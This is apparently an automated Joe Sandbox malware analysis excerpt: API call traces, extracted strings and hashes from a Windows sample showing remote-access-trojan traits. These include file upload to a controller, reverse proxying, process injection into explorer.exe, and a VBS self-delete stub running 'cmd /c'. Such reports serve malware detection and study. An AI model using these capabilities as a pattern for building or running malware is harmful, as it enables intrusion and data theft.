                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                                                                                                                                                            • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                                                                                                                                                            • API String ID: 1884690901-3066803209
                                                                                                                                                                                                                                            • Opcode ID: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                                                                                                                                                                                                            • Instruction ID: 4837f293f8898be8956b4197083d1ab2d903a2927be0ecc228378ed3697c5d3b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9df5948d7382cf6b602db3d3c6d548fe2f1b10a719ec4cb532c2586deab72b90
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01B191715083409BC214FB25C892BAFB7E5ABD4314F40493EF889632D2EF789945CB9B
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                                                                                                                                                              • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                              • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                              • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                              • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                                                                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                                                                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                                                                                                                                            • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                                                                                                                                                            • API String ID: 3795512280-3163867910
                                                                                                                                                                                                                                            • Opcode ID: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                                                                                                                                                                                                            • Instruction ID: 8be46055dc56f0d2ec4b071ca6400761e29966989419bbb2416efbd82a73718c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ad637de4abed7bea4a9c298fd38dc88212808bad0aa3e762a0e0af5c839b2e2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06517C616043005ACB05BB71D866ABF769AAFD1309F00053FF886B71E2DF3DA945869A
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___free_lconv_mon.LIBCMT ref: 004500C1
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F310
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F322
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F334
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F346
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F358
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F36A
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F37C
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F38E
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3A0
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3B2
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3C4
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3D6
                                                                                                                                                                                                                                              • Part of subcall function 0044F2F3: _free.LIBCMT ref: 0044F3E8
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004500B6
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004500D8
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004500ED
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004500F8
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0045011A
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0045012D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0045013B
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00450146
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 0045017E
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00450185
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004501A2
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 004501BA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 161543041-0
                                                                                                                                                                                                                                            • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                                            • Instruction ID: 71386be3831ae4e36ed8ba8c0666741f952bc44bbd11cc85bbb3aa2ad55dcdb0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5318135600B009FEB30AA39D845B5773E9EF02325F11842FE849E7692DF79AD88C719
APIs
• __EH_prolog.LIBCMT ref: 0041913D
• GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041916F
• CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191FB
• Sleep.KERNEL32(000003E8), ref: 0041927D
• GetLocalTime.KERNEL32(?), ref: 0041928C
• Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419375
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
• String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
• API String ID: 489098229-65789007
• Opcode ID: 987b661f2f94bb4b23b66fd70baf870604e4a68319259e1e5b8a0a3655f2dcde
• Instruction ID: 451d4021779863bb8065bd5e36f4a774b326d3833db1a6038cb7dac0f018a91b
• Opcode Fuzzy Hash: 987b661f2f94bb4b23b66fd70baf870604e4a68319259e1e5b8a0a3655f2dcde
• Instruction Fuzzy Hash: 56519071A002449ACB14BBB5D866AFE7BA9AB45304F00407FF849B71D2EF3C5D85C799
APIs
• connect.WS2_32(?,?,?), ref: 004042A5
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
• WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CreateEvent$ErrorLastLocalTimeconnect
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
• API String ID: 994465650-2151626615
• Opcode ID: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
• Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
• Opcode Fuzzy Hash: 0e18f61abc9e3d8a2747cabaf845d162c66a56537a1401371773013c123a1612
• Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
• ExitProcess.KERNEL32 ref: 0040C832
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
• String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• API String ID: 1913171305-390638927
• Opcode ID: cb2bafc17bd6d2fc7c2746a26f37568c25dfbde7b533674c545cbe9e54b8fc58
• Instruction ID: 3122975e65398275e0c1a8e950e5c558235310b29c64ef4ed93c25b66c9664dc
• Opcode Fuzzy Hash: cb2bafc17bd6d2fc7c2746a26f37568c25dfbde7b533674c545cbe9e54b8fc58
• Instruction Fuzzy Hash: A6414C329001185ACB14F761DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
APIs
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
• Instruction ID: d73775b2238990a9214358b8270f61d1b8324a28925b392a315ea9bfa7ac6158
• Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
• Instruction Fuzzy Hash: 89C16672D40204AFEB20DBA8CC82FEF77F8AB05714F15446AFA44FB282D6749D458768
APIs
• WaitForSingleObject.KERNEL32(?,000000FF,00475B90,?,?,00000000,00475B90,004017F3), ref: 004047FD
• SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404808
• CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404811
• closesocket.WS2_32(?), ref: 0040481F
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 00404856
• SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404867
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B90,004017F3), ref: 0040486E
• SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404880
• CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404885
• CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040488A
• SetEvent.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 00404895
• CloseHandle.KERNEL32(?,?,?,00000000,00475B90,004017F3), ref: 0040489A
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$ObjectSingleWait$closesocket
• String ID:
• API String ID: 3658366068-0
• Opcode ID: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
• Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
• Opcode Fuzzy Hash: b48fac80ca5b148fdad783a92e94d640e15fce6fe8a7544b86a0cf0c1a1052f0
• Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48
APIs
  • Part of subcall function 00454660: CreateFileW.KERNEL32(00000000,?,?,;JE,?,?,00000000,?,00454A3B,00000000,0000000C), ref: 0045467D
• GetLastError.KERNEL32 ref: 00454AA6
• __dosmaperr.LIBCMT ref: 00454AAD
• GetFileType.KERNEL32(00000000), ref: 00454AB9
• GetLastError.KERNEL32 ref: 00454AC3
• __dosmaperr.LIBCMT ref: 00454ACC
• CloseHandle.KERNEL32(00000000), ref: 00454AEC
• CloseHandle.KERNEL32(?), ref: 00454C36
• GetLastError.KERNEL32 ref: 00454C68
• __dosmaperr.LIBCMT ref: 00454C6F
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID:
• String ID: 65535$udp
• API String ID: 0-1267037602
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
• GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
• __dosmaperr.LIBCMT ref: 004393DD
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
• GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
• __dosmaperr.LIBCMT ref: 0043941A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
• GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
• __dosmaperr.LIBCMT ref: 0043946E
• _free.LIBCMT ref: 0043947A
• _free.LIBCMT ref: 00439481
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
• String ID:
• API String ID: 2441525078-0
APIs
• SetEvent.KERNEL32(?,?), ref: 00404E71
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
• TranslateMessage.USER32(?), ref: 00404F30
• DispatchMessageA.USER32(?), ref: 00404F3B
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
• API String ID: 2956720200-749203953
APIs
• WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
• CloseHandle.KERNEL32(00000000), ref: 00416F2D
• DeleteFileA.KERNEL32(00000000), ref: 00416F3C
• ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
• String ID: <$@$@FG$@FG$Temp
• API String ID: 1107811701-2245803885
APIs
• GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
• GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\iGhDjzEiDU.exe), ref: 00406705
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
• API String ID: 2050909247-4145329354
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                                                                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                                                                                                                            • Opcode ID: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                                                                                                                                                                            • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90cb661901cd042af288c915e3e3b558208b36f008bb68e694e16de296acffd5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446DEF
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446DFB
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E06
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E11
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E1C
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E27
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E32
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E3D
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E48
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446E56
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                            • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Eventinet_ntoa
                                                                                                                                                                                                                                            • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                                                                                                                                            • API String ID: 3578746661-4192532303
                                                                                                                                                                                                                                            • Opcode ID: 30b6b719644d82d783a8bc9089df8f8f99093d3b204285341a7bcfdb0059d80f
                                                                                                                                                                                                                                            • Instruction ID: 5385bfc655a789aeb426c9546597e5e9554731b695d1c34d5ebe0a8eef4996cc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30b6b719644d82d783a8bc9089df8f8f99093d3b204285341a7bcfdb0059d80f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA517371A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CADC5CB9E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DBF), ref: 0045516C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DecodePointer
                                                                                                                                                                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                            • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                            • Opcode ID: 7f99e8985e511aa33529a80be55df7ea072d7a4d3ffec7ebceee198b32f2909e
                                                                                                                                                                                                                                            • Instruction ID: dc575b74d0f085a316b11c585a5ec2812edae3f3668b4c4373b6e849a421fba0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f99e8985e511aa33529a80be55df7ea072d7a4d3ffec7ebceee198b32f2909e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7517D70900A09CBCF149FA9E9581BDBBB0FB09342F244197EC45A7366DB7D8A188B1D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                                                                            • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                                                                            • API String ID: 1462127192-2001430897
                                                                                                                                                                                                                                            • Opcode ID: 90e70b3c48fc0f521c57fefc4eea8134555d63251f5e005d225ddbf87606e40e
